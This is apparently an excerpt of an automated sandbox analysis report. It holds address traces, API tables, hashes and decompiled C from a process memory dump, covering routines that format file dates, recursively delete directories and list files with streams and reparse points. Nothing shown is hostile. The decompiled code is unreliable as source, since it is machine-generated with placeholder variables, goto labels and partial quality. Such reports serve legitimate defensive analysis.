0x4a744fd4
0x4a744fda
0x4a744fcb
0x4a744fcb
0x4a744fcc
0x4a744fcc
0x4a744fdb
0x4a744fe0
0x4a744fa8
0x4a744fb3
0x4a744fb9
0x4a7428a3
0x4a7428b1
0x4a7428b1
0x4a742875
0x4a74288b
0x4a744fed
0x4a744ff4
0x4a745021
0x4a74502f
0x4a745034
0x4a744ff6
0x4a745000
0x4a74500e
0x4a745016
0x4a745016
0x4a74503a
0x4a74503d
0x4a74503e
0x4a74503e
0x4a742890
0x4a742892
0x4a742895
0x4a742895
0x4a742899
0x4a74289a
0x4a7428a1
0x00000000
0x4a7428a1
0x4a7427d0
0x4a7427d6
0x4a7427d6
0x4a7427dd
0x4a744e91
0x4a742800
0x4a742801
0x00000000
0x4a742801
0x4a7427ea
0x00000000
0x4a7428b4
0x4a7428b4
0x4a7428b6
0x4a7428b6
0x4a7428b8
0x4a7428b9
0x4a7428be
0x4a7428c1
0x4a7428c6
0x4a744ea0
0x4a744ea2
0x4a744ea2
0x4a744eac
0x4a744ed8
0x4a744eae
0x4a744eae
0x4a744eb1
0x4a744eb3
0x4a744eb3
0x4a744eb6
0x4a744eb6
0x4a744eba
0x4a744ebb
0x4a744eca
0x4a744ece
0x4a744ed0
0x4a744ed0
0x00000000
0x4a744eac
0x4a7428cc
0x4a7428ce
0x4a7428ce
0x4a7428d1
0x4a7428d1
0x4a7428d5
0x4a7428d6
0x4a7428e4
0x4a7428e9
0x4a7428eb
0x4a7428ee
0x4a7428ee
0x4a742802
0x4a742802
0x4a742808
0x00000000
0x4a742808
0x4a7427ce
0x4a742696
0x4a7426a1
0x4a7426b1
0x4a7426b5
0x4a744edf
0x4a744edf
0x4a744ee5
0x4a744ee7
0x4a744eec
0x00000000
0x4a744eec
0x4a7426bb
0x4a7426c6
0x4a7426cd
0x4a7426d0
0x00000000
0x00000000
0x4a7426d8
0x4a7426ed
0x4a7426fd
0x00000000
0x4a742703
0x00000000
0x4a742703

APIs

FileTimeToLocalFileTime.KERNEL32(?,?,?,?,00002000,4A760640,75A9A9E9), ref: 4A74276F
FileTimeToSystemTime.KERNEL32(?,?), ref: 4A742783
GetLocaleInfoW.KERNEL32(00000000,0000001F,?,00000080), ref: 4A7427B2
GetDateFormatW.KERNEL32 ref: 4A742836
memmove.MSVCRT ref: 4A7428E9
GetSystemTime.KERNEL32(?,00002000,4A760640,75A9A9E9), ref: 4A744E4F
SystemTimeToFileTime.KERNEL32(?,?), ref: 4A744E63

Part of subcall function 4A7430B6: SystemTimeToFileTime.KERNEL32(?,00002000,?,00002000,4A760640,75A9A9E9), ref: 4A74310F

realloc.MSVCRT ref: 4A744F57

Part of subcall function 4A73756D: GetUserDefaultLCID.KERNEL32(4A7427B1,0000001F,?,00000080), ref: 4A73756D

Strings

%02d%s%02d%s%02d, xrefs: 4A744F7C
%s %s , xrefs: 4A744FDB
%s , xrefs: 4A744FAE

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
String ID: %02d%s%02d%s%02d$%s $%s %s
API String ID: 1795611712-4023967598
Opcode ID: cbc809ef69449068f0fb82ebb803d9eb0e5ab27a0cfba2ea5007750e429ff4d6
Instruction ID: 015411a66b4d2b94adaa833b8fa8eac4470f3c306806b146f40a363f05defadd
Opcode Fuzzy Hash: cbc809ef69449068f0fb82ebb803d9eb0e5ab27a0cfba2ea5007750e429ff4d6
Instruction Fuzzy Hash: 99B1D7B2948225EBDF708FA0CC45EDA7BBDEB09310F1200A5E609DB551DB31DA5CCBA0

Uniqueness

Uniqueness Score: -1.00%

Function 4A750492, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 326
fileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E4A750492(void* __edi, WCHAR* _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v528;
				struct _WIN32_FIND_DATAW _v1120;
				WCHAR* _v1124;
				signed int* _v1128;
				long _v1132;
				void* _v1136;
				char _v1140;
				void* __ebx;
				void* __esi;
				signed int _t84;
				intOrPtr* _t86;
				WCHAR* _t87;
				signed int _t89;
				void* _t93;
				void* _t95;
				signed int _t100;
				void* _t105;
				short* _t107;
				signed int _t109;
				signed int _t110;
				signed int _t117;
				long _t122;
				intOrPtr* _t123;
				intOrPtr* _t135;
				WCHAR* _t152;
				intOrPtr* _t159;
				intOrPtr* _t160;
				void* _t163;
				short* _t168;
				long _t173;
				short _t174;
				short _t177;
				intOrPtr _t181;
				intOrPtr* _t182;
				intOrPtr* _t183;
				short* _t187;
				signed int _t191;
				void* _t192;

				_t188 = __edi;
				_t84 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t84 ^ _t191;
				_t86 = _a8;
				_t190 = _a4;
				_v1128 = _t86;
				 *_t86 = 1;
				_t87 = _t190;
				_v1124 = _t190;
				_t187 =  &(_t87[1]);
				do {
					_t174 =  *_t87;
					_t87 =  &(_t87[1]);
				} while (_t174 != 0);
				_t89 = _t87 - _t187;
				_t173 = _t89 >> 1;
				_v1132 = _t173;
				if(_t89 != 0) {
					_push(__edi);
					if(_t173 + 3 <= 0x104) {
						_t190 = FindFirstFileW;
						_t93 = FindFirstFileW(FindFirstFileW,  &_v1120);
						if(_t93 != 0xffffffff) {
							FindClose(_t93);
						} else {
							_v1120.dwReserved0 = _v1120.dwReserved0 & 0x00000000;
							_v1120.dwFileAttributes = 0x10;
						}
						if((_v1120.dwFileAttributes & 0x00000010) == 0 || (_v1120.dwFileAttributes & 0x00000400) != 0 && (_v1120.dwReserved0 & 0x20000000) != 0) {
							L69:
							_push(_v1124);
							goto L70;
						} else {
							E4A73185A( &_v528, 0x104, _v1124);
							_t100 =  *(_v1124 + _t173 * 2 - 2) & 0x0000ffff;
							if(_t100 != 0x3a && _t100 != 0x5c) {
								E4A7320A9(_t190,  &_v528, 0x104, E4A732EC8);
								_t173 = _t173 + 1;
								_v1132 = _t173;
							}
							E4A7320A9(_t190,  &_v528, 0x104, E4A739FFC);
							_t105 = FindFirstFileW( &_v528,  &_v1120);
							_v1136 = _t105;
							if(_t105 == 0xffffffff) {
								goto L69;
							} else {
								while( *0x4a7541b4 == 0) {
									_t187 =  &(_v1120.cAlternateFileName);
									_t107 = _t187;
									_t190 =  &(_t107[1]);
									do {
										_t177 =  *_t107;
										_t107 =  &(_t107[1]);
									} while (_t177 != 0);
									_t109 = _t107 - _t190;
									_t110 = _t109 >> 1;
									if(_t109 != 0) {
										L23:
										_push(_t187);
										if(_t110 + _t173 >= 0x104) {
											 *_v1128 =  *_v1128 & 0x00000000;
											E4A736D44(_t177, 0x400023da, 2, _v1124);
											break;
										}
										_push(0x104 - _t173);
										_t190 = _t191 + _t173 * 2 - 0x20c;
										_push(_t190);
										E4A73185A();
										_t117 = _v1120.dwFileAttributes;
										_t173 = _t117;
										if((_t117 & 0x00000010) == 0) {
											if((_t117 & 0x00000001) != 0) {
												SetFileAttributesW( &_v528, _t117 & 0xfffffffe);
											}
											if(DeleteFileW( &_v528) != 0) {
												L63:
												if(FindNextFileW(_v1136,  &_v1120) == 0) {
													break;
												}
												_t173 = _v1132;
												continue;
											} else {
												_t122 = GetLastError();
												if(_t122 == 0x4d3) {
													break;
												}
												if(_t122 == 3) {
													_t152 =  &_v528;
													__imp___wcsnicmp(_t152, L"\\\\?\\", 4);
													_t192 = _t192 + 0xc;
													if(_t152 != 0 && GetFullPathNameW( &_v528, 0, 0, 0) > 0x104) {
														SetLastError(0x6f);
													}
												}
												_t123 =  &(_v1120.cAlternateFileName);
												_t187 = _t123 + 2;
												do {
													_t178 =  *_t123;
													_t123 = _t123 + 2;
												} while (_t178 != 0);
												if(_t123 == _t187) {
													L61:
													E4A736D44(_t178, 0x4000271b, 1,  &_v528);
													_t192 = _t192 + 0xc;
													L62:
													_push(0);
													_push(GetLastError());
													E4A736D44(_t178);
													SetFileAttributesW( &_v528, _t173);
													 *_v1128 =  *_v1128 & 0x00000000;
													goto L63;
												}
												 *_t190 = 0;
												_t135 =  &(_v1120.cFileName);
												_t187 = _t135 + 2;
												do {
													_t181 =  *_t135;
													_t135 = _t135 + 2;
												} while (_t181 != 0);
												_t178 = _v1132;
												if((_t135 - _t187 >> 1) + _v1132 < 0x104) {
													E4A7320A9(_t190,  &_v528, 0x104,  &(_v1120.cFileName));
													E4A736D44(_t178, 0x4000271b, 1,  &_v528);
													_t192 = _t192 + 0xc;
													 *_t190 = 0;
													E4A7320A9(_t190,  &_v528, 0x104,  &(_v1120.cAlternateFileName));
													goto L62;
												}
												E4A7320A9(_t190,  &_v528, 0x104,  &(_v1120.cAlternateFileName));
												goto L61;
											}
										}
										_t182 = E4A732EC4;
										_t159 =  &(_v1120.cFileName);
										while(1) {
											_t187 =  *_t159;
											if(_t187 !=  *_t182) {
												break;
											}
											if(_t187 == 0) {
												L30:
												_t159 = 0;
												L32:
												if(_t159 == 0) {
													goto L63;
												}
												_t183 = E4A732EBC;
												_t160 =  &(_v1120.cFileName);
												while(1) {
													_t187 =  *_t160;
													if(_t187 !=  *_t183) {
														break;
													}
													if(_t187 == 0) {
														L38:
														_t160 = 0;
														L40:
														if(_t160 == 0) {
															goto L63;
														}
														_t163 = E4A750492(0x104,  &_v528,  &_v1140);
														if( *0x4a7541b4 != 0) {
															goto L67;
														}
														if(_t163 != 0) {
															_t184 = _v1128;
															 *_v1128 =  *_v1128 & 0x00000000;
															if(_t163 != 0x91 || _v1140 != 0) {
																E4A736D44(_t184, 0x4000271b, 1,  &_v528);
																_t192 = _t192 + 0xc;
																_push(0);
																_push(GetLastError());
																E4A736D44(_t184);
															}
														}
														goto L63;
													}
													_t187 =  *((intOrPtr*)(_t160 + 2));
													_t49 = _t183 + 2; // 0x2e
													if(_t187 !=  *_t49) {
														break;
													}
													_t160 = _t160 + 4;
													_t183 = _t183 + 4;
													if(_t187 != 0) {
														continue;
													}
													goto L38;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L40;
											}
											_t187 =  *((intOrPtr*)(_t159 + 2));
											_t46 = _t182 + 2; // 0x5c0000
											if(_t187 !=  *_t46) {
												break;
											}
											_t159 = _t159 + 4;
											_t182 = _t182 + 4;
											if(_t187 != 0) {
												continue;
											}
											goto L30;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										goto L32;
									}
									_t187 =  &(_v1120.cFileName);
									_t168 = _t187;
									_t190 =  &(_t168[1]);
									do {
										_t177 =  *_t168;
										_t168 =  &(_t168[1]);
									} while (_t177 != 0);
									_t110 = _t168 - _t190 >> 1;
									goto L23;
								}
								L67:
								FindClose(_v1136);
								if( *0x4a7541b4 == 0) {
									goto L69;
								}
								_t95 = 0;
								goto L71;
							}
						}
					} else {
						_push(_t190);
						L70:
						_t95 = E4A750202(_t173, 0x104);
						L71:
						_pop(_t188);
						goto L72;
					}
				} else {
					_t95 = 0xa1;
					L72:
					return E4A7313A9(_t95, _t173, _v8 ^ _t191, _t187, _t188, _t190);
				}
			}

0x4a750492
0x4a75049d
0x4a7504a4
0x4a7504a7
0x4a7504ac
0x4a7504af
0x4a7504b5
0x4a7504bb
0x4a7504bd
0x4a7504c3
0x4a7504c6
0x4a7504c6
0x4a7504ca
0x4a7504cb
0x4a7504d0
0x4a7504d4
0x4a7504d6
0x4a7504dc
0x4a7504e8
0x4a7504f3
0x4a750503
0x4a750509
0x4a75050e
0x4a750524
0x4a750510
0x4a750510
0x4a750517
0x4a750517
0x4a750531
0x4a7508cd
0x4a7508cd
0x00000000
0x4a750553
0x4a750561
0x4a75056c
0x4a750575
0x4a75058a
0x4a75058f
0x4a750590
0x4a750590
0x4a7505a3
0x4a7505b6
0x4a7505b8
0x4a7505c1
0x00000000
0x4a7505c7
0x4a7505c7
0x4a7505d4
0x4a7505da
0x4a7505dc
0x4a7505df
0x4a7505df
0x4a7505e3
0x4a7505e4
0x4a7505e9
0x4a7505eb
0x4a7505ed
0x4a750608
0x4a75060c
0x4a75060d
0x4a7508a2
0x4a7508ac
0x00000000
0x4a7508b1
0x4a750617
0x4a750618
0x4a75061f
0x4a750620
0x4a750625
0x4a75062b
0x4a75062f
0x4a750723
0x4a750730
0x4a750730
0x4a750745
0x4a75082c
0x4a750841
0x00000000
0x00000000
0x4a750843
0x00000000
0x4a75074b
0x4a75074b
0x4a750756
0x00000000
0x00000000
0x4a75075f
0x4a750763
0x4a75076f
0x4a750775
0x4a75077a
0x4a750794
0x4a750794
0x4a75077a
0x4a75079a
0x4a7507a0
0x4a7507a3
0x4a7507a3
0x4a7507a7
0x4a7507a8
0x4a7507b1
0x4a7507ef
0x4a7507fd
0x4a750802
0x4a750805
0x4a750805
0x4a75080d
0x4a75080e
0x4a75081d
0x4a750829
0x00000000
0x4a750829
0x4a7507b5
0x4a7507b8
0x4a7507be
0x4a7507c1
0x4a7507c1
0x4a7507c5
0x4a7507c6
0x4a7507cb
0x4a7507d9
0x4a75085d
0x4a750870
0x4a750877
0x4a75087a
0x4a75088c
0x00000000
0x4a75088c
0x4a7507ea
0x00000000
0x4a7507ea
0x4a750745
0x4a750635
0x4a75063a
0x4a750640
0x4a750640
0x4a750646
0x00000000
0x00000000
0x4a75064b
0x4a750662
0x4a750662
0x4a75066b
0x4a75066d
0x00000000
0x00000000
0x4a750673
0x4a750678
0x4a75067e
0x4a75067e
0x4a750684
0x00000000
0x00000000
0x4a750689
0x4a7506a0
0x4a7506a0
0x4a7506a9
0x4a7506ab
0x00000000
0x00000000
0x4a7506bf
0x4a7506cb
0x00000000
0x00000000
0x4a7506d3
0x4a7506d9
0x4a7506df
0x4a7506e7
0x4a750704
0x4a750709
0x4a75070c
0x4a750714
0x4a750715
0x4a75071b
0x4a7506e7
0x00000000
0x4a7506d3
0x4a75068b
0x4a75068f
0x4a750693
0x00000000
0x00000000
0x4a750695
0x4a750698
0x4a75069e
0x00000000
0x00000000
0x00000000
0x4a75069e
0x4a7506a4
0x4a7506a6
0x00000000
0x4a7506a6
0x4a75064d
0x4a750651
0x4a750655
0x00000000
0x00000000
0x4a750657
0x4a75065a
0x4a750660
0x00000000
0x00000000
0x00000000
0x4a750660
0x4a750666
0x4a750668
0x00000000
0x4a750668
0x4a7505ef
0x4a7505f5
0x4a7505f7
0x4a7505fa
0x4a7505fa
0x4a7505fe
0x4a7505ff
0x4a750606
0x00000000
0x4a750606
0x4a7508b4
0x4a7508ba
0x4a7508c7
0x00000000
0x00000000
0x4a7508c9
0x00000000
0x4a7508c9
0x4a7505c1
0x4a7504f5
0x4a7504f5
0x4a7508d3
0x4a7508d3
0x4a7508d8
0x4a7508d8
0x00000000
0x4a7508d8
0x4a7504de
0x4a7504de
0x4a7508d9
0x4a7508e6
0x4a7508e6

APIs

FindFirstFileW.KERNEL32(?,?,?,?,00000000), ref: 4A750509
FindFirstFileW.KERNEL32(?,00000400,?,00000104,Function_00009FFC,?,00000104,?), ref: 4A7505B6

Part of subcall function 4A750202: GetFullPathNameW.KERNEL32(4A7508D8,00000004,?,?,74EC43D5), ref: 4A750227

Strings

\\?\, xrefs: 4A750769

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: FileFindFirst$FullNamePath
String ID: \\?\
API String ID: 3395701646-4282027825
Opcode ID: 6b44f268989e90e5e6ab0d7cd6991940e76a03f05121472c474c03782438ed17
Instruction ID: 12ce5535bca37851f76e59468a2e6b27420b47382b98a431a587bc46018822d3
Opcode Fuzzy Hash: 6b44f268989e90e5e6ab0d7cd6991940e76a03f05121472c474c03782438ed17
Instruction Fuzzy Hash: D0C1F4B2A0521A9EEB709F64CC49FDA7BB8EF05311F0145A1E605D7845E730DE8ECB64

Uniqueness

Uniqueness Score: -1.00%

Function 4A73A902, Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 417
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E4A73A902(void* _a4, void* _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				short _v528;
				char _v1048;
				signed int _v17422;
				signed int _v17424;
				signed short _v17426;
				signed int _v17428;
				void _v17436;
				char _v17956;
				short _v18026;
				char _v18028;
				char _v18036;
				intOrPtr _v18040;
				signed int _v18044;
				int _v18048;
				void* _v18052;
				void* _v18056;
				void* _v18060;
				long _v18064;
				char _v18068;
				char _v18072;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t176;
				signed int _t180;
				signed int _t181;
				int _t182;
				int _t183;
				int _t185;
				intOrPtr _t186;
				int _t190;
				int _t193;
				void* _t195;
				intOrPtr* _t196;
				int _t201;
				int _t202;
				signed int _t204;
				intOrPtr _t205;
				int _t206;
				void* _t207;
				int _t210;
				int _t213;
				intOrPtr _t216;
				int _t217;
				void* _t218;
				int _t221;
				int _t224;
				void* _t226;
				int _t227;
				intOrPtr* _t229;
				signed int _t231;
				void* _t234;
				signed int _t245;
				signed int _t246;
				intOrPtr _t254;
				int _t255;
				int _t258;
				int _t260;
				int _t265;
				int _t272;
				intOrPtr _t279;
				signed int* _t281;
				signed short _t285;
				signed int* _t286;
				int _t288;
				intOrPtr _t289;
				intOrPtr _t291;
				int _t293;
				intOrPtr _t296;
				signed int _t297;
				void* _t300;
				int _t301;
				signed int _t302;
				signed int* _t303;
				signed int _t304;

				E4A732C26(0x4694);
				_t176 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t176 ^ _t304;
				_t298 = _a8;
				_t303 = _a16;
				_t281 = _t298 + 4;
				_t282 = _t281[7];
				_v18040 = _a12;
				_t300 = _a4;
				 *((intOrPtr*)(_t300 + 0x28)) =  *((intOrPtr*)(_t300 + 0x28)) + _t281[8];
				_v18060 = _t300;
				_v18044 = _t298;
				asm("adc [edi+0x2c], ecx");
				_t180 =  *_t303;
				if((_t180 & 0x00000010) == 0 || _t180 < 0) {
					L2:
					_t181 =  *_t303;
					if((_t181 & 0x00000040) == 0) {
						__eflags = _t181 & 0x00000004;
						if((_t181 & 0x00000004) != 0) {
							L21:
							_t182 = E4A751214(_t281, _t282, _v18040, _t181, _t281);
							L4:
							_v18048 = _t182;
							L5:
							_t183 = _v18048;
							goto L6;
						}
						__eflags = _t181 & 0x00000402;
						if(__eflags == 0) {
							_t285 =  *(_t298 + 2) & 0x0000ffff;
							__eflags = _t285;
							if(__eflags == 0) {
								_t286 =  &(_t281[0xb]);
							} else {
								_t286 = _t281 + 0x2c + (_t285 & 0x0000ffff) * 2;
							}
							_push(_t281);
							_t185 = E4A751066(_t281, _t286, _t300, _t303, __eflags, _v18040, _t181, _t286);
							_v18048 = _t185;
							__eflags = _t185;
							if(_t185 == 0) {
								_t186 =  *0x4a7708d8; // 0xc
								__eflags = _t186 + 2;
								E4A742CB6(_t286, _v18040, _t186 + 2);
								_v18048 = E4A7512BE(_t281, _v18040, _t303[0x17],  *_t303, _t281);
							}
							_t183 = E4A74330F(_v18040);
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							}
							goto L6;
						}
						_t190 = E4A742BCD(_t281, _t282, __eflags, _v18040, _t303[0x17], _t181, _t281);
						_v18048 = _t190;
						__eflags = _t190;
						if(_t190 != 0) {
							L18:
							_t183 = E4A74330F(_v18040);
							__eflags = _t183;
							if(_t183 != 0) {
								goto L6;
							}
							__eflags =  *_t303 & 0x00100000;
							if(( *_t303 & 0x00100000) == 0) {
								goto L5;
							}
							_t193 = E4A739F7B( &_v528, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
							__eflags = _t193;
							if(_t193 == 0) {
								_t195 =  &_v528;
								__imp__FindFirstStreamW(_t195, 0,  &_v18036, _t193);
								_t300 = _t195;
								__eflags = _t300 - 0xffffffff;
								if(_t300 == 0xffffffff) {
									goto L5;
								} else {
									goto L64;
								}
								do {
									L64:
									_t196 =  &_v18028;
									_t298 = _t196 + 2;
									do {
										_t288 =  *_t196;
										_t196 = _t196 + 2;
										__eflags = _t288;
									} while (_t288 != 0);
									__eflags = _t196 - _t298 >> 1 - 2;
									if(__eflags < 0) {
										L68:
										_t201 = E4A751387(_t288, __eflags, _v18040,  *_t303, _t281,  &_v18036);
										_v18048 = _t201;
										__eflags = _t201;
										if(_t201 != 0) {
											goto L70;
										}
										_t183 = E4A74330F(_v18040);
										__eflags = _t183;
										if(_t183 != 0) {
											goto L6;
										}
										goto L70;
									}
									__eflags = _v18026 - 0x3a;
									if(__eflags == 0) {
										goto L70;
									}
									goto L68;
									L70:
									_t202 =  &_v18036;
									__imp__FindNextStreamW(_t300, _t202);
									__eflags = _t202;
								} while (_t202 != 0);
								FindClose(_t300);
							}
							goto L5;
						}
						__eflags =  *_t303 & 0x00000400;
						if(( *_t303 & 0x00000400) != 0) {
							_t204 = _v18044;
							__eflags =  *((short*)(_t204 + 2));
							if( *((short*)(_t204 + 2)) != 0) {
								_t272 =  *0x4a7540a8; // 0x13
								_t296 =  *0x4a7706c4; // 0x11
								_t51 = _t272 + 2; // 0x13
								E4A742CB6(_t296, _v18040, _t296 + _t51);
								_push(_t281);
								E4A73AA6D(_t281, _t296, _t300, _v18040,  *_t303, _t281 + 0x2c + ( *(_v18044 + 2) & 0x0000ffff) * 2);
							}
							_t205 =  *0x4a7706c4; // 0x11
							_t289 =  *0x4a7708d8; // 0xc
							_t290 = _t289 + _t205;
							_t206 =  *0x4a7540a8; // 0x13
							_t60 = _t206 + 3; // 0xf
							_t207 = _t289 + _t205 + _t60;
						} else {
							_t279 =  *0x4a7706c4; // 0x11
							_t290 =  *0x4a7540a8; // 0x13
							_t35 = _t279 + 2; // 0x15
							_t207 = _t290 + _t35;
						}
						E4A742CB6(_t290, _v18040, _t207);
						__eflags =  *_t303 & 0x00040000;
						if(( *_t303 & 0x00040000) != 0) {
							_v18044 = _v18044 & 0x00000000;
							_v18056 = 0x104;
							_v18052 = 0x104;
							_t210 = E4A731896(0x10000);
							_v18048 = _t210;
							__eflags = _t210;
							if(_t210 != 0) {
								_t213 = E4A739F7B( &_v1048, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
								__eflags = _t213;
								if(_t213 != 0) {
									L30:
									E4A73AAF4(_v18040, "...");
									L35:
									E4A73142E(_v18048);
									L36:
									__eflags =  *_t303 & 0x00000400;
									_t291 =  *0x4a7708dc; // 0x16
									if(( *_t303 & 0x00000400) == 0) {
										_t216 =  *0x4a7706c4; // 0x11
										_t290 = _t291 + _t216;
										__eflags = _t290;
										_t217 =  *0x4a7540a8; // 0x13
										_t96 = _t217 + 3; // 0x19
										_t218 = _t290 + _t96;
									} else {
										_t254 =  *0x4a7708d8; // 0xc
										_t290 = _t291 + _t254 +  *0x4a7706c4;
										_t255 =  *0x4a7540a8; // 0x13
										_t94 = _t255 + 4; // -1249314474
										_t218 = _t291 + _t254 +  *0x4a7706c4 + _t94;
									}
									E4A742CB6(_t290, _v18040, _t218);
									goto L17;
								}
								_t258 =  *0x4a75402c( &_v1048, 1, _v18048, 0x10000,  &_v18068);
								__eflags = _t258;
								if(_t258 == 0) {
									goto L30;
								}
								_push( &_v18072);
								_t260 =  &_v18044;
								_push(_t260);
								_push(_v18048);
								M4A754028();
								__eflags = _t260;
								if(_t260 != 0) {
									_push( &_v18064);
									_push( &_v18052);
									_push( &_v17956);
									_push( &_v18056);
									_t265 =  &_v528;
									_push(_t265);
									_push(_v18044);
									_push(0);
									M4A754024();
									__eflags = _t265;
									if(_t265 != 0) {
										E4A73AAF4(_v18040,  &_v17956);
										E4A73AAF4(_v18040, E4A732EC8);
										_push( &_v528);
									} else {
										_push("...");
									}
									_push(_v18040);
									E4A73AAF4();
									_t88 =  &_v18044;
									 *_t88 = _v18044 & 0x00000000;
									__eflags =  *_t88;
									goto L35;
								}
								goto L30;
							}
							E4A73AAF4(_v18040, "...");
							goto L36;
						} else {
							L17:
							_push(_t281);
							_t221 = E4A73AA6D(_t281, _t290, _t300, _v18040,  *_t303,  &(_t281[0xb]));
							__eflags =  *_t281 & 0x00000400;
							_v18048 = _t221;
							if(( *_t281 & 0x00000400) != 0) {
								__eflags = _t281[9] & 0x20000000;
								if((_t281[9] & 0x20000000) == 0) {
									goto L18;
								}
								_t224 = E4A739F7B( &_v528, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
								__eflags = _t224;
								if(_t224 == 0) {
									_t226 = CreateFileW( &_v528, 8, 7, 0, 3, 0x2200000, 0);
									_v18056 = _t226;
									__eflags = _t226 - 0xffffffff;
									if(_t226 != 0xffffffff) {
										_t298 =  &_v17436;
										_t227 = DeviceIoControl(_t226, 0x900a8, 0, 0,  &_v17436, 0x4002,  &_v18064, 0);
										__eflags = _t227;
										if(_t227 != 0) {
											E4A73AAF4(_v18040, 0x4a74b0f4);
											__eflags = _v17436 - 0xa0000003;
											if(_v17436 != 0xa0000003) {
												__eflags = _v17436 - 0xa000000c;
												if(_v17436 != 0xa000000c) {
													_t229 = 0x4a74b124;
													_v18044 = 0x4a74b124;
													_t298 = 0x4a74b126;
													do {
														_t293 =  *_t229;
														_t229 = _t229 + 2;
														__eflags = _t293;
													} while (_t293 != 0);
													_t231 = _t229 - 0x4a74b126;
													__eflags = _t231;
													_t301 = (_t231 >> 1) + (_t231 >> 1);
													L58:
													_t234 = E4A731896(_t301 + 2);
													_v18052 = _t234;
													__eflags = _t234;
													if(_t234 != 0) {
														memcpy(_t234, _v18044, _t301);
														_t302 = _t301 >> 1;
														__eflags = _t302;
														 *((short*)(_v18052 + _t302 * 2)) = 0;
														E4A73AAF4(_v18040, _v18052);
														E4A73142E(_v18052);
													}
													E4A73AAF4(_v18040, 0x4a74b0f0);
													_t300 = _v18060;
													L61:
													CloseHandle(_v18056);
													goto L18;
												}
												_t301 = _v17422 & 0x0000ffff;
												_v18044 = _t304 + ((_v17424 & 0x0000ffff) >> 1) * 2 - 0x4404;
												__eflags = _t301;
												if(_t301 != 0) {
													goto L58;
												}
												_t245 = (_v17428 & 0x0000ffff) >> 1;
												__eflags = _t245;
												_t246 = _t304 + _t245 * 2 - 0x4404;
												L54:
												_t301 = _v17426 & 0x0000ffff;
												_v18044 = _t246;
												goto L58;
											}
											_t301 = _v17422 & 0x0000ffff;
											_v18044 = _t304 + ((_v17424 & 0x0000ffff) >> 1) * 2 - 0x4408;
											__eflags = _t301;
											if(_t301 != 0) {
												goto L58;
											}
											_t246 = _t304 + ((_v17428 & 0x0000ffff) >> 1) * 2 - 0x4408;
											goto L54;
										}
										_push(L" [...]");
										L47:
										_push(_v18040);
										E4A73AAF4();
										goto L61;
									}
									_push(L" [..]");
									goto L47;
								}
								E4A73AAF4(_v18040, L" [.]");
							}
							goto L18;
						}
					}
					_t182 = E4A73ABA0(_t303, _v18040, _t181,  *((intOrPtr*)(_t300 + 4)), _t281);
					goto L4;
				} else {
					 *_t303 = _t180 & 0xffffffef;
					_t183 = E4A73B0B7(_t300, _v18040, _t303);
					 *_t303 =  *_t303 | 0x00000010;
					_t297 =  *_t303;
					__eflags = _t183;
					if(_t183 != 0) {
						L6:
						return E4A7313A9(_t183, _t281, _v8 ^ _t304, _t298, _t300, _t303);
					}
					_t298 = _v18044;
					_t282 = _t297 | 0x80000000;
					 *_t303 = _t297 | 0x80000000;
					goto L2;
				}
			}

0x4a73a90c
0x4a73a911
0x4a73a918
0x4a73a91b
0x4a73a923
0x4a73a926
0x4a73a929
0x4a73a92c
0x4a73a936
0x4a73a939
0x4a73a93c
0x4a73a942
0x4a73a948
0x4a73a94b
0x4a73a94f
0x4a73a959
0x4a73a959
0x4a73a95d
0x4a743262
0x4a743264
0x4a74ac0f
0x4a74ac17
0x4a73a973
0x4a73a973
0x4a73a979
0x4a73a979
0x00000000
0x4a73a979
0x4a74326a
0x4a74326f
0x4a74b086
0x4a74b08a
0x4a74b08d
0x4a74b098
0x4a74b08f
0x4a74b092
0x4a74b092
0x4a74b09b
0x4a74b0a4
0x4a74b0a9
0x4a74b0af
0x4a74b0b1
0x4a74b0b3
0x4a74b0b8
0x4a74b0c2
0x4a74b0d8
0x4a74b0d8
0x4a74b0e4
0x4a740c21
0x4a740c23
0x00000000
0x00000000
0x00000000
0x4a740c29
0x4a743280
0x4a743285
0x4a74328b
0x4a74328d
0x4a7432e6
0x4a7432ec
0x4a7432f1
0x4a7432f3
0x00000000
0x00000000
0x4a7432f9
0x4a7432ff
0x00000000
0x00000000
0x4a74afe1
0x4a74afe6
0x4a74afe8
0x4a74aff8
0x4a74afff
0x4a74b005
0x4a74b007
0x4a74b00a
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74b010
0x4a74b010
0x4a74b010
0x4a74b016
0x4a74b019
0x4a74b019
0x4a74b01d
0x4a74b01e
0x4a74b01e
0x4a74b027
0x4a74b02a
0x4a74b036
0x4a74b046
0x4a74b04b
0x4a74b051
0x4a74b053
0x00000000
0x00000000
0x4a74b05b
0x4a74b060
0x4a74b062
0x00000000
0x00000000
0x00000000
0x4a74b062
0x4a74b02c
0x4a74b034
0x00000000
0x00000000
0x00000000
0x4a74b068
0x4a74b068
0x4a74b070
0x4a74b076
0x4a74b076
0x4a74b07b
0x4a74b07b
0x00000000
0x4a74afe8
0x4a74328f
0x4a743295
0x4a74ac21
0x4a74ac27
0x4a74ac2c
0x4a74ac2e
0x4a74ac33
0x4a74ac39
0x4a74ac44
0x4a74ac53
0x4a74ac61
0x4a74ac61
0x4a74ac66
0x4a74ac6b
0x4a74ac71
0x4a74ac73
0x4a74ac78
0x4a74ac78
0x4a74329b
0x4a74329b
